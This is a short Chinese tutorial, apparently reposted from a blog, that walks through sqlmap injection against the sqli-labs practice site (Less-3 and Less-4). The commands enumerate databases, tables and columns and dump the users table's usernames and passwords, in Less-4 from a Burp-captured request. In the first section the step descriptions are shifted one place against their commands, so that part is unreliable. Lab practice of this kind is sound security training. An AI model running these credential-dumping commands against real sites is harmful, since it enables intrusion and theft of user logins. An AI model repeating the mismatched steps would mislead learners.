一、以less-3/为入口,利用sqlmap实施自动化注入,获取sqli-labs网站的登录账户和密码
1、访问http://192.168.207.1/sql/Less-3,启动sqlmap
2、寻找注入点http://192.168.207.1/sql/Less-3/?id=1
3、 获取数据库的所有库名 -u "http://192.168.207.1/sql/Less-3/?id=1"
4、获取网站当前所在数据库的库名 -u "http://192.168.207.1/sql/Less-3/?id=1" --dbs
5、获取数据库security的所有表名 -u "http://192.168.207.1/sql/Less-3/?id=1" --current-db
6、获取users表中的全部字段名 -u "http://192.168.207.1/sql/Less-3/?id=1" -D security --tables
7、获取users表id、password、username字段的全部值
-u "http://192.168.207.1/sql/Less-3/?id=1" -D security -T users -C id,username,password --dump
二、以less-4/为入口,利用sqlmap实施自动化注入,获取sqli-labs网站的登录账户和密码。
1、利用burp suit抓取http://192.168.207.1/sql/Less-4/?id=1的包
2、将拦截的报文以a.txt文档保存在c盘根目录下
3、寻找注入点,获取网站所在数据库基本信息 -r C:\a.txt
4、获取所有数据库的库名 -r C:\a.txt --dbs
5、获取当前网站所在数据库的库名 -r C:\a.txt --current-db
6、获取数据库security的所有表名 -r C:\a.txt -D security --tables
7、获取users表中的所有字段 -r C:\a.txt -D security -T users --columns
8、获取id、password、username字段的所有值 -r C:\a.txt -D security -T users -C id,username,password --dump
文章来源地址https://www.toymoban.com/news/detail-462491.html
文章来源:https://www.toymoban.com/news/detail-462491.html
到了这里,关于sqlmap的基础使用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!